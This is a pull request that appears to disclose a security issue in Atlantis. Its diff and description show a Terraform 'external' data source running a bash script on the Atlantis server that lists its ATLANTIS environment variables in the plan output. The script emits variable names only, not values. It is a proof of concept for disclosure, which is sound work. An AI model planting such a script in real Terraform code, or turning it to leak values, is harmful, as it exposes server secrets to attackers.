### PR TITLE
Leaking atlantis environment variables via terraform external data source

### DIFF
--- a/atlantis.yaml
+++ b/atlantis.yaml
@@ -3,6 +3,9 @@ projects:
 - name: p1
   dir: p1
   workflow: w1
+- name: p2
+  dir: p2
+  workflow: w1
 workflows:
   w1:
     plan:

--- a/p2/env_to_json.sh
+++ b/p2/env_to_json.sh
@@ -1,0 +1,19 @@
+#!/bin/bash
+
+# Initialize an empty JSON object
+json="{"
+
+# Iterate through the environment variables
+while IFS='=' read -r name value; do
+    # Append the name of the environment variable to the JSON object
+    json="$json\"$name\":null,"
+done < <(env | grep ATLANTIS | sort | grep -v ATLANTIS_GH_WEBHOOK_SECRET)
+
+# Remove the trailing comma from the JSON object
+json="${json%,}"
+
+# Close the JSON object
+json="$json}"
+
+# Output the JSON object
+echo "$json"

--- a/p2/main.tf
+++ b/p2/main.tf
@@ -1,0 +1,7 @@
+data "external" "example" {
+  program = ["bash","${path.module}/env_to_json.sh"]
+}
+
+output "custom_output" {
+  value = data.external.example.result
+}


### PR DESCRIPTION

## Description

This Pull Request demonstrates a potential security concern regarding the unintended exposure of Atlantis environment variables through a Terraform external data source. The use of an external script (`env_to_json.sh`) in conjunction with Terraform's `external` data source allows for capturing the environment variables in a JSON format. This behavior could potentially be exploited to gain unauthorized access to sensitive information present in the environment variables of the Atlantis server.

## Threat Model

### Attack Vector

An attacker could create a Terraform configuration file that uses the `external` data source to execute a script. This script could then collect all the environment variables from the Atlantis environment and expose them, potentially leaking sensitive information.

```hcl
data "external" "example" {
  program = ["bash","${path.module}/env_to_json.sh"]
}
```

```bash
#!/bin/bash

# Initialize an empty JSON object
json="{"

# Iterate through the environment variables
while IFS='=' read -r name value; do
    # Append the name of the environment variable to the JSON object
    json="$json\"$name\":null,"
done < <(env | grep ATLANTIS | sort | grep -v ATLANTIS_GH_WEBHOOK_SECRET)

# Remove the trailing comma from the JSON object
json="${json%,}"

# Close the JSON object
json="$json}"

# Output the JSON object
echo "$json"
```